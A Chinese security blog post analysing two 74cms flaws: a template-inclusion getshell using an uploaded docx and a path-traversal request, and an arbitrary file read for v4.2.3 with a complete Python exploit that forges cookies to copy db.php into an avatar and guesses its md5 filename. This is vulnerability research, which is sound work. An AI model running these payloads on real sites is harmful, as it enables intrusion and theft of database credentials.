<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content>
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
          74cms 漏洞分析 - Kingkk&#39;s Blog
        
    </title>

    <link rel="canonical" href="https://www.kingkk/2018/06/74cms漏洞分析/">

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/hux-blog.min.css">

    <!-- Pygments Highlight CSS -->
    <link rel="stylesheet" href="/css/highlight.css">

    <!-- Custom Fonts -->
    <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
    <!-- Hux change font-awesome CDN to qiniu -->
    <link href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">


    <!-- Hux Delete, sad but pending in China
    <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/
    css'>
    -->


    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- ga & ba script hoook -->
    <script></script>
</head>


<!-- hack iOS CSS :active style -->
<body ontouchstart="">

    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Kingkk&#39;s Blog</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
        <div id="huxblog_navbar">
            <div class="navbar-collapse">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="/">Home</a>
                    </li>

                    

                        
                    

                        
                        <li>
                            <a href="/about/">About</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/archives/">Archives</a>
                        </li>
                        
                    

                        
                        <li>
                            <a href="/tags/">Tags</a>
                        </li>
                        
                    
                    
                </ul>
            </div>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>
<script>
    // Drop Bootstarp low-performance Navbar
    // Use customize navbar with high-quality material design animation
    // in high-perf jank-free CSS3 implementation
    var $body   = document.body;
    var $toggle = document.querySelector('.navbar-toggle');
    var $navbar = document.querySelector('#huxblog_navbar');
    var $collapse = document.querySelector('.navbar-collapse');

    $toggle.addEventListener('click', handleMagic)
    function handleMagic(e){
        if ($navbar.className.indexOf('in') > 0) {
        // CLOSE
            $navbar.className = " ";
            // wait until animation end.
            setTimeout(function(){
                // prevent frequently toggle
                if($navbar.className.indexOf('in') < 0) {
                    $collapse.style.height = "0px"
                }
            },400)
        }else{
        // OPEN
            $collapse.style.height = "auto"
            $navbar.className += " in";
        }
    }
</script>


    <!-- Main Content -->
    
<!-- Image to hack wechat -->
<!-- <img src="https://www.kingkk/img/icon_wechat.png" width="0" height="0"> -->
<!-- <img src="{{ site.baseurl }}/{% if page.header-img %}{{ page.header-img }}{% else %}{{ site.header-img }}{% endif %}" width="0" height="0"> -->

<!-- Post Header -->
<style type="text/css">
    header.intro-header{
        background-image: url('/img/home-bg.jpg')
    }
</style>
<header class="intro-header" >
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <div class="tags">
                        
                    </div>
                    <h1>74cms 漏洞分析</h1>
                    <h2 class="subheading"></h2>
                    <span class="meta">
                        Posted by kingkk on
                        2018-06-06
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

    <!-- Post Container -->
            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container">

                <h1 id="74cms-v4-0-v4-1-前台getshell"><a href="#74cms-v4-0-v4-1-前台getshell" class="headerlink" title="74cms v4.0-v4.1 前台getshell"></a>74cms v4.0-v4.1 前台getshell</h1><p>参考<a href="http://0day5.com/archives/4257/" target="_blank" rel="noopener">文章</a> 漏洞发生在<code>\Application\Home\Controller\MController.class.php</code>中 代码如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(!I(<span class="string">'get.org'</span>,<span class="string">''</span>,<span class="string">'trim'</span>) &amp;&amp; C(<span class="string">'PLATFORM'</span>) == <span class="string">'mobile'</span> &amp;&amp; <span class="keyword">$this</span>-&gt;apply[<span class="string">'Mobile'</span>])&#123;</span><br><span class="line">           redirect(build_mobile_url());</span><br><span class="line">	&#125;</span><br><span class="line">       $type = I(<span class="string">'get.type'</span>,<span class="string">'android'</span>,<span class="string">'trim'</span>);</span><br><span class="line">       $android_download_url = C(<span class="string">'qscms_android_download'</span>)?C(<span class="string">'qscms_android_download'</span>):<span class="string">'http://demo2.7yun.com/phone/apk/74cms.apk'</span>;</span><br><span class="line">       $ios_download_url = C(<span class="string">'qscms_ios_download'</span>)?C(<span class="string">'qscms_ios_download'</span>):<span class="string">''</span>;</span><br><span class="line">       <span class="keyword">$this</span>-&gt;assign(<span class="string">'android_download_url'</span>,$android_download_url);</span><br><span class="line">       <span class="keyword">$this</span>-&gt;assign(<span class="string">'ios_download_url'</span>,$ios_download_url);</span><br><span class="line">       <span class="keyword">$this</span>-&gt;assign(<span class="string">'type'</span>,$type);</span><br><span class="line">       <span class="keyword">$this</span>-&gt;display(<span class="string">'M/'</span>.$type);</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到在获取了用户传递进来的<code>$type</code>变量之后，直接带入<code>display</code>函数，<code>display</code>函数在thinkphp中一般是用来显示模板html文件。<br>不妨跟进看一下 <code>ThinkPHP\Library\Think\Controller.class.php</code>中的display函数仅仅调用了下view中的函数<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">display</span><span class="params">($templateFile=<span class="string">''</span>,$charset=<span class="string">''</span>,$contentType=<span class="string">''</span>,$content=<span class="string">''</span>,$prefix=<span class="string">''</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;view-&gt;display($templateFile,$charset,$contentType,$content,$prefix);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>再次跟进<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">display</span><span class="params">($templateFile=<span class="string">''</span>,$charset=<span class="string">''</span>,$contentType=<span class="string">''</span>,$content=<span class="string">''</span>,$prefix=<span class="string">''</span>)</span> </span>&#123;</span><br><span class="line">    G(<span class="string">'viewStartTime'</span>);</span><br><span class="line">    <span class="comment">// 视图开始标签</span></span><br><span class="line">    Hook::listen(<span class="string">'view_begin'</span>,$templateFile);</span><br><span class="line">    <span class="comment">// 解析并获取模板内容</span></span><br><span class="line">    $content = <span class="keyword">$this</span>-&gt;fetch($templateFile,$content,$prefix);</span><br><span class="line">    <span class="comment">// 输出模板内容</span></span><br><span class="line">    <span class="keyword">$this</span>-&gt;render($content,$charset,$contentType);</span><br><span class="line">    <span class="comment">// 视图结束标签</span></span><br><span class="line">    Hook::listen(<span class="string">'view_end'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>主要就是获取模板内容，也就是之前display传入的参数，然后解析并输出。<br>然而thinkphp试允许用户在template中使用php代码的<br><img src="http://blog.kingkk.com/wp-content/uploads/2018/06/55e1cd211612f28da7ae0b055d18dc37.png" alt><br>然后就是要找一个可以上传文件的点，图片上传会被进行处理，这里我们选择上传docx个人简历<br><img src="http://blog.kingkk.com/wp-content/uploads/2018/06/73453cfc4d75bfb2699a0e2cfe91a9bb.png" alt><br>返回的json中能看到文件的路径<br><img src="http://blog.kingkk.com/wp-content/uploads/2018/06/0a550deee4cbe9ce70b6a9ed8c3277cd.png" alt><br>这样就可以包含这个伪造的template<br>index.php?m=&amp;c=M&amp;a=index&amp;type=../data/upload/word_resume/1806/06/5b17a62407bac.docx<br><img src="http://blog.kingkk.com/wp-content/uploads/2018/06/3055c0c1dbab38eb9083f302779005b1.png" alt>  </p>
<h1 id="74cms-v4-2-3-任意文件读取"><a href="#74cms-v4-2-3-任意文件读取" class="headerlink" title="74cms v4.2.3 任意文件读取"></a>74cms v4.2.3 任意文件读取</h1><p>漏洞发生在<code>\Application\Home\Controller\MembersController.class.php</code>文件中，219行的位置处<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">'bind'</span> == I(<span class="string">'post.org'</span>,<span class="string">''</span>,<span class="string">'trim'</span>) &amp;&amp; cookie(<span class="string">'members_bind_info'</span>))&#123;</span><br><span class="line">    $user_bind_info = object_to_array(cookie(<span class="string">'members_bind_info'</span>));</span><br><span class="line">    $user_bind_info[<span class="string">'uid'</span>] = $data[<span class="string">'uid'</span>];</span><br><span class="line">    $oauth = <span class="keyword">new</span> \Common\qscmslib\oauth($user_bind_info[<span class="string">'type'</span>]);</span><br><span class="line">    $oauth-&gt;bindUser($user_bind_info);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;_save_avatar($user_bind_info[<span class="string">'temp_avatar'</span>],$data[<span class="string">'uid'</span>]);<span class="comment">//临时头像转换</span></span><br><span class="line">    cookie(<span class="string">'members_bind_info'</span>, <span class="keyword">NULL</span>);<span class="comment">//清理绑定COOKIE</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里能看到程序接受了post传递过来的org参数，以及cookie中的members_bind_info数组<br>然后实例化了一个oauth类，然后生成了个临时头像，查看一下_save_avatar的代码<br>大约在571行处<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">_save_avatar</span><span class="params">($avatar,$uid)</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(!$avatar) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    $path = C(<span class="string">'qscms_attach_path'</span>).<span class="string">'avatar/temp/'</span>.$avatar;</span><br><span class="line">    $image = <span class="keyword">new</span> \Common\ORG\ThinkImage();</span><br><span class="line">    $date = date(<span class="string">'ym/d/'</span>);</span><br><span class="line">    $save_avatar=C(<span class="string">'qscms_attach_path'</span>).<span class="string">'avatar/'</span>.$date;<span class="comment">//图片存储路径</span></span><br><span class="line">    <span class="keyword">if</span>(!is_dir($save_avatar)) mkdir($save_avatar,<span class="number">0777</span>,<span class="keyword">true</span>);</span><br><span class="line">    $savePicName = md5($uid.time()).<span class="string">".jpg"</span>;</span><br><span class="line">    $filename = $save_avatar.$savePicName;</span><br><span class="line">    $size = explode(<span class="string">','</span>,C(<span class="string">'qscms_avatar_size'</span>));</span><br><span class="line">    copy($path, $filename);</span><br><span class="line">    <span class="keyword">foreach</span> ($size <span class="keyword">as</span> $val) &#123;</span><br><span class="line">        $image-&gt;open($path)-&gt;thumb($val,$val,<span class="number">3</span>)-&gt;save(<span class="string">"&#123;$filename&#125;._&#123;$val&#125;x&#123;$val&#125;.jpg"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    M(<span class="string">'Members'</span>)-&gt;where(<span class="keyword">array</span>(<span class="string">'uid'</span>=&gt;$uid))-&gt;setfield(<span class="string">'avatars'</span>,$date.$savePicName);</span><br><span class="line">    @unlink($path);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里能看到将传入的第一个参数进行路径的拼接，然后直接将内容存入一个.jpg的图片文件中 在之前的代码中能看到<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">…</span><br><span class="line">$user_bind_info = object_to_array(cookie(<span class="string">'members_bind_info'</span>));</span><br><span class="line">……</span><br><span class="line"><span class="keyword">$this</span>-&gt;_save_avatar($user_bind_info[<span class="string">'temp_avatar'</span>],$data[<span class="string">'uid'</span>]);</span><br></pre></td></tr></table></figure></p>
<p>传入的第一个参数是直接从cookie中获取的，而cookie恰巧也是我们能够伪造的。就可以利用相对路径进行路径跳转。<br>图片也是可以直接进行下载的，从而引发任意文件读取。 </p>
<p>接下来看下需要达成任意文件读取所需要的一些条件</p>
<ul>
<li>ajax==1,reg_type==2,utype==2,ucenter==bind,org=bind  (post中的数据)</li>
<li>members_bind_info[type] == qq/ sina / tabao</li>
<li>members_bind_info[username] 不能重复</li>
<li>members_bind_info[uid] 需要设置一个未被注册的id</li>
<li>members_bind_info[temp_avatar]则是要读取的文件路径</li>
</ul>
<p>最后就是要知道被移动的文件位置。</p>
<p>data\upload\avatar\1806\11\1db0ab21cfccf510759cf4b2ec60ba7c.jpg</p>
<p>可以看到是在upload下一个时间的文件夹，文件名则是一串哈希值，哈希的生成规律如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$savePicName = md5($uid.time()).<span class="string">".jpg"</span>;</span><br></pre></td></tr></table></figure></p>
<p>由uid和时间time以同进行哈希得到的值。最后exp如下<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding=utf8</span></span><br><span class="line"><span class="keyword">import</span> time, random, string, hashlib </span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">post_exp</span><span class="params">()</span>:</span></span><br><span class="line">	url = root_url+<span class="string">'/index.php'</span></span><br><span class="line">	username = <span class="string">''</span>.join(random.sample(string.ascii_letters, <span class="number">6</span>))</span><br><span class="line">	uid = random.randint(<span class="number">100</span>,<span class="number">999999</span>)</span><br><span class="line">	params = &#123;<span class="string">'m'</span>:<span class="string">''</span>,<span class="string">'c'</span>:<span class="string">'members'</span>,<span class="string">'a'</span>:<span class="string">'register'</span>&#125;</span><br><span class="line">	data = &#123;<span class="string">'ajax'</span>:<span class="string">'1'</span>,<span class="string">'org'</span>:<span class="string">'bind'</span>,<span class="string">'reg_type'</span>:<span class="string">'2'</span>,<span class="string">'utype'</span>:<span class="string">'2'</span>,<span class="string">'ucenter'</span>:<span class="string">'bind'</span>&#125;</span><br><span class="line">	cookies = &#123;	<span class="string">'members_bind_info[temp_avatar]'</span>:<span class="string">'../../../../Application/Common/Conf/db.php'</span>,</span><br><span class="line">				<span class="string">'members_bind_info[type]'</span>:<span class="string">'qq'</span>,</span><br><span class="line">				<span class="string">'members_uc_info[password]'</span>:username,</span><br><span class="line">				<span class="string">'members_uc_info[uid]'</span>:str(uid),</span><br><span class="line">				<span class="string">'members_uc_info[username]'</span>:username</span><br><span class="line">				&#125;</span><br><span class="line">	r = requests.post(url,params=params,data=data,cookies=cookies)</span><br><span class="line">	pic_time = int(time.time())</span><br><span class="line">	<span class="keyword">return</span> uid,pic_time</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_picname</span><span class="params">(uid,pic_time)</span>:</span></span><br><span class="line">	localtime = time.localtime(pic_time)</span><br><span class="line">	unhash_name = str(uid)+str(pic_time)</span><br><span class="line">	hash_name = hashlib.md5(unhash_name.encode(<span class="string">'utf8'</span>)).hexdigest()+<span class="string">'.jpg'</span></span><br><span class="line">	pic_url = root_url+<span class="string">'/data/upload/avatar/&#123;&#125;&#123;&#125;/&#123;&#125;/'</span>.format(str(localtime[<span class="number">0</span>])[<span class="number">2</span>:],str(localtime[<span class="number">1</span>]).zfill(<span class="number">2</span>),localtime[<span class="number">2</span>])+hash_name</span><br><span class="line">	<span class="keyword">return</span> pic_url</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span>	</span><br><span class="line">	<span class="keyword">global</span> root_url</span><br><span class="line">	root_url = <span class="string">'http://localhost/74cms4.2.3'</span></span><br><span class="line"></span><br><span class="line">	uid,pic_time = post_exp()</span><br><span class="line">	<span class="keyword">for</span> pt <span class="keyword">in</span> range(pic_time<span class="number">-10</span>,pic_time+<span class="number">10</span>):</span><br><span class="line">		pic_url = get_picname(uid,pt)</span><br><span class="line">		r = requests.get(pic_url)</span><br><span class="line">		<span class="keyword">if</span> r.status_code == <span class="number">200</span>:</span><br><span class="line">			print(<span class="string">"Vulnerable!"</span>)</span><br><span class="line">			print(r.text)</span><br><span class="line">			exit()</span><br><span class="line"></span><br><span class="line">		print(pt,pic_url,r)</span><br><span class="line">	print(<span class="string">"may be unvulnerable"</span>)</span><br><span class="line">		</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	main()</span><br></pre></td></tr></table></figure></p>
<p>成功读取到db.php配置文件 <img src="http://blog.kingkk.com/wp-content/uploads/2018/06/eb2555624262d4b37878019f9183efb5.png" alt></p>


                <hr>

                

                <ul class="pager">
                    
                        <li class="previous">
                            <a href="/2018/06/flask-学习记录/" data-toggle="tooltip" data-placement="top" title="flask-学习记录">&larr; Previous Post</a>
                        </li>
                    
                    
                        <li class="next">
                            <a href="/2018/05/metinfo5-3漏洞分析/" data-toggle="tooltip" data-placement="top" title="metinfo5.3漏洞分析">Next Post &rarr;</a>
                        </li>
                    
                </ul>

                

                

            </div>
    <!-- Side Catalog Container -->
        

    <!-- Sidebar Container -->

            <div class="
                col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                sidebar-container">

                <!-- Featured Tags -->
                
                <section>
                    <!-- no hr -->
                    <h5><a href="/tags/">FEATURED TAGS</a></h5>
                    <div class="tags">
                       
                    </div>
                </section>
                

                <!-- Friends Blog -->
                
                <hr>
                <h5>FRIENDS</h5>
                <ul class="list-inline">

                    
                        <li><a href="//98587329.github.io" target="_blank">mt</a></li>
                    
                        <li><a href="//www.cflowerth.com" target="_blank">FAtwAER</a></li>
                    
                        <li><a href="//lufe1.cn" target="_blank">lufei</a></li>
                    
                        <li><a href="//0x3f97.github.io" target="_blank">gd</a></li>
                    
                        <li><a href="http://www.lsafe.org" target="_blank">4dmin$5</a></li>
                    
                        <li><a href="http://www.thekingofnight.com/" target="_blank">theKingOfNight</a></li>
                    
                        <li><a href="http://www.thekingofnight.com/" target="_blank">Hpdoger</a></li>
                    
                        <li><a href="//mochazz.github.io/" target="_blank">七月火</a></li>
                    
                        <li><a href="https://mengsec.com/" target="_blank">蒙尘</a></li>
                    
                        <li><a href="https://patrilic.top/" target="_blank">Patrilic&#39;s Blog</a></li>
                    
                </ul>
                
            </div>

        </div>
    </div>
</article>







<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script>
    async("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js",function(){
        anchors.options = {
          visible: 'always',
          placement: 'right',
          icon: '#'
        };
        anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
    })
</script>
<style>
    /* place left on bigger screen */
    @media all and (min-width: 800px) {
        .anchorjs-link{
            position: absolute;
            left: -0.75em;
            font-size: 1.1em;
            margin-top : -0.1em;
        }
    }
</style>



    <!-- Footer -->
    <!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                
                
                

                

                

                
                    <li>
                        <a target="_blank"  href="https://github.com/kingkaki">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                

                

                </ul>
                <p class="copyright text-muted">
                    Copyright &copy; Kingkk&#39;s Blog 2019 
                    <br>
                    Theme by <a href="http://huangxuan.me">Hux</a> 
                    <span style="display: inline-block; margin: 0 5px;">
                        <i class="fa fa-heart"></i>
                    </span> 
                    Ported by <a href="http://blog.kaijun.rocks">Kaijun</a> <!-- | 
                    <iframe
                        style="margin-left: 2px; margin-bottom:-5px;"
                        frameborder="0" scrolling="0" width="91px" height="20px"
                        src="https://ghbtns.com/github-btn.html?user=kaijun&repo=hexo-theme-huxblog&type=star&count=true" >
                    </iframe>
                    -->
                </p>
            </div>
        </div>
    </div>
</footer>

<!-- jQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script src="/js/hux-blog.min.js"></script>


<!-- async load function -->
<script>
    function async(u, c) {
      var d = document, t = 'script',
          o = d.createElement(t),
          s = d.getElementsByTagName(t)[0];
      o.src = u;
      if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
      s.parentNode.insertBefore(o, s);
    }
</script>

<!-- 
     Because of the native support for backtick-style fenced code blocks 
     right within the Markdown is landed in Github Pages, 
     From V1.6, There is no need for Highlight.js, 
     so Huxblog drops it officially.

     - https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0  
     - https://help.github.com/articles/creating-and-highlighting-code-blocks/    
-->
<!--
    <script>
        async("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function(){
            hljs.initHighlightingOnLoad();
        })
    </script>
    <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet">
-->


<!-- jquery.tagcloud.js -->
<script>
    // only load tagcloud.js in tag.html
    if($('#tag_cloud').length !== 0){
        async("https://www.kingkk/js/jquery.tagcloud.js",function(){
            $.fn.tagcloud.defaults = {
                //size: {start: 1, end: 1, unit: 'em'},
                color: {start: '#bbbbee', end: '#0085a1'},
            };
            $('#tag_cloud a').tagcloud();
        })
    }
</script>

<!--fastClick.js -->
<script>
    async("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
        var $nav = document.querySelector("nav");
        if($nav) FastClick.attach($nav);
    })
</script>


<!-- Google Analytics -->




<!-- Baidu Tongji -->

<script>
    // dynamic User by Hux
    var _baId = '2095437387a20021fd7e176e0c1aac8b';

    // Originial
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?" + _baId;
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
</script>


<!-- Side Catalog -->





<!-- Image to hack wechat -->
<img src="https://www.kingkk/img/icon_wechat.png" width="0" height="0" />
<!-- Migrate from head to bottom, no longer block render and still work -->

</body>

</html>
